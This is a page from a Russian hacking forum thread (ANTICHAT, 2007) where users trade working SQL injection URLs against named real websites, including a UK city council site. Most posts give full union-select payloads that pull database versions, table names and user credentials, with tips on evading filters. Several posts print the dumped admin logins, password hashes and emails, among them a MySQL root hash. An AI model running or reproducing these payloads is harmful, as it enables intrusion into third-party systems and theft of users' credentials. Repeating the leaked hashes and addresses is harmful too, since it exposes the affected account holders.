HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 214 из 1602 « Первая < 114164204 210 211 212 213 214 215 216 217 218 2242643147141214 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

sql-injections
  #1  
Старый 09.05.2007, 12:49
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-injections
Xage.ru (молодежный портал)

смотрим версию
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,1,2,3,4/*
а она пятая. (вывод в строке поиска).
смотрим таблицы
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+252,1/*
так навскидку обращаем внимание на таблицы access, administrator, exp_members, user.
аналогично смотрим поля в таблицах
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,0,1,2,3,4+from+exp_members+limit+0,1/*
в первых двух не нашел ничего интересного, в exp_members есть поля username,password,authcode,email
Admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

таблица user относится к форуму vB , и поля там соответственные.
1:Admin:f1e82a7d9d6f8a25019349e1982d4f24:W%L:admin@xage.ru

---------------------------------------------------------------------

Цитата:
Сообщение от Y.Dmitriy  
Я в этом сильно не шарю но помоему скуль тут есть а там сами смотрите... если нет, то пусть модуры удалять...
http://smru.com.ua/globalnews.php?type=n&num=-1579+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5/*

----------------------------------------------------------------------

Y.Dmitriy, примеры погляди и все на свои места сразу встанет.
Цитата:
и есчооо

http://khomutynnik.info/view.php?type=list&status=0'&p=1'
http://khomutynnik.info/view.php?type=list&p=1&status=0+and+1=0+union+sele ct+1,2,3,concat_ws(0x3a,user(),version(),database( ))/*
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось _Pantera_; 11.05.2007 в 22:36..
 
Ответить с цитированием

  #2  
Старый 07.05.2007, 13:42
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
С нами: 10091878

Репутация: 369
По умолчанию
Любимый туристический портал о Чехии
Код:
http://www.ilovecz.ru/index.php?idofpage=-1+union+select+1,user(),version()/*
 
Ответить с цитированием

  #3  
Старый 07.05.2007, 14:50
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию
Цитата:
http://valakas.perm.ru/index2.php?c=14
в mssql полный ноль : )
Цитата:
http://valakas.perm.ru/index2.php?c=13
http://valakas.perm.ru/index2.php?c=14-1
где ты здесь инъекцию нашел? \=
 
Ответить с цитированием

  #4  
Старый 07.05.2007, 15:23
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию
www.krasota.ru
- здесь ошиваются такие люди как сергей зверев и прочие гандурасы \=
Цитата:
http://www.krasota.ru/forum/print.phtm?fident=9&ident=-1+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71)/*
таблиц не было времени подбирать \=
 
Ответить с цитированием

  #5  
Старый 07.05.2007, 15:25
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию
Цитата:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near ')'. (severity 15) in D:\www_la2\show_clan_info.php on line 53

Warning: mssql_query() [function.mssql-query]: Query failed in D:\www_la2\show_clan_info.php on line 53

Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in D:\www_la2\show_clan_info.php on line 55


Fatal error: Cannot redeclare antiinjection() (previously declared in D:\www_la2\includes\functions.php:9) in D:\www_la2\base\index.php on line 171

разве это не показатель возможности проведения скуль инжекта?
или я что-то путаю?
в данном случае не показатель.
Цитата:
Incorrect syntax near ')'. (severity 15) in D:\www_la2\show_clan_info.php on line 53
ошибка в запросе, находящемся в самом скрипте, а не определяемым строкой адреса.
Последний раз редактировалось p-range; 07.05.2007 в 15:28..
 
Ответить с цитированием

  #6  
Старый 07.05.2007, 15:35
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами: 10145068

Репутация: 453
По умолчанию
Цитата:
Сообщение от Серенький  
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?
Использовать char:
nuke_users=char(110,117,107,101,95,117,115,101,114 ,115)
В твоем случае -
Код:
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.columns+where+table_name=char(110,117,107,101,95,117,115,101,114,115)+limit+0,1/*


Код:
http://www.chasm.ru/profile.php?userid=1153%20union%20select%201,password,3,4,5,6,7,8,9,0,11,12,13,14,email,login,17,18,19,20,21,22%20from%20users/*
Последний раз редактировалось kamaz; 07.05.2007 в 15:38..
 
Ответить с цитированием

  #7  
Старый 07.05.2007, 18:13
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
Код:
http://dbusinessnews.com/shownews.php?newsid=-1+and+1+union+select+concat(email,0x3a,password),2,3,4,5,6,7+from+users+limit+1,1/*&type_news=latest
Пассы в открытом виде. Лимитом можно погонять.
__________________
..
 
Ответить с цитированием

sql-inj
  #8  
Старый 07.05.2007, 21:31
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-inj
Кафедра КВН
Сайт: http://www.kafedra.com.ua/
уязвимость: http://www.kafedra.com.ua/modules/dictionary/detail.php?id=885'
таблица: xoops_users
подобранные поля: uname,pass,email,uid
26 организмов
Цитата:
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pa ss,email),5,6+from+xoops_users/*
1:insight:af743111422bd5bb3e8bd5618b12bbae
админка
Цитата:
http://www.kafedra.com.ua/admin.php
таблица: ibf_members
подобранные поля: name,password,email,id
3121 организм
Цитата:
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,id,name,pass word,email,website),5,6+from+ibf_members/**
На сайте поставили новый форум vBulletin, от него таблицы не нашел.
 
Ответить с цитированием

  #9  
Старый 07.05.2007, 21:10
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
www.webchats.tv

Код:
http://www.webchats.tv/webchat.php?ID=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53+from+information_schema.tables+limit+20,1/*
 
Ответить с цитированием

Lisburn City Council
  #10  
Старый 07.05.2007, 22:39
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию Lisburn City Council
Занесло блин случайно на сайт правительства
Код:
http://www.lisburncity.gov.uk/your-city-council/council-minutes-and-reports/index.php?id=-4+union+select+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*&sr=540'&month=&year=&search_keyword=&freshform=no
root:03e6ff876dd3e5b1
 
Ответить с цитированием
Ответ
Страница 214 из 1602 « Первая < 114164204 210 211 212 213 214 215 216 217 218 2242643147141214 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.